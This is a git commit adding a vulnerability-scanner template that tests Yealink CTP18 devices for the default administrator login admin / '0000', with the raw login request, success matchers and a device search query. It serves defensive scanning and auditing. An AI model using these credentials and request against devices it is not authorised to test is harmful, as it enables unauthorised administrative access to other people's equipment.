Merge pull request #7691 from FreeZeroDays/main

Create yealink-ctp18-default-login.yaml
2023-07-15 13:35:06 +05:30 · 2023-07-15 13:35:06 +05:30 · e9927ad6f3
parent e8e0d63d1f d1863c9509
commit e9927ad6f3
1 changed files with 49 additions and 0 deletions
--- a/http/default-logins/yealink/yealink-default-login.yaml
+++ b/http/default-logins/yealink/yealink-default-login.yaml
@ -0,0 +1,49 @@
+id: yealink-default-login
+
+info:
+  name: Yealink CTP18 - Default Login
+  author: parzival
+  severity: high
+  description: |
+    Yealink CTP18 Default Administrator Credentials Discovered.
+  reference:
+    - https://support.yealink.com
+  metadata:
+    verified: true
+    fofa-query: "Yealink CTP18"
+  tags: default-login,yealink
+
+http:
+  - raw:
+      - |
+        POST /api/auth/login?p=Login&t=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept: application/json, text/plain, */*
+
+        username={{username}}&pwd={{password}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - '0000'
+
+    host-redirects: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{"ret":"ok","data":"ok"}'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200